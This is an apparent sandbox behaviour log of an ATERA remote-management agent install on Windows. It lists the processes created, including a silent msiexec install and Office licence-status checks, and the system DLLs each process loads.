Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	Process created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIEE25.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5828390 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF48E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5829796 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: unknown unknown

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: riched20.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: usp10.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: msls31.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptnet.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: cryptnet.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: webio.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: secur32.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: schannel.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mskeyprotect.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ntasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ncrypt.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: ncryptsslp.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: msasn1.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: gpapi.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Section loaded: vcruntime140_clr0400.dll
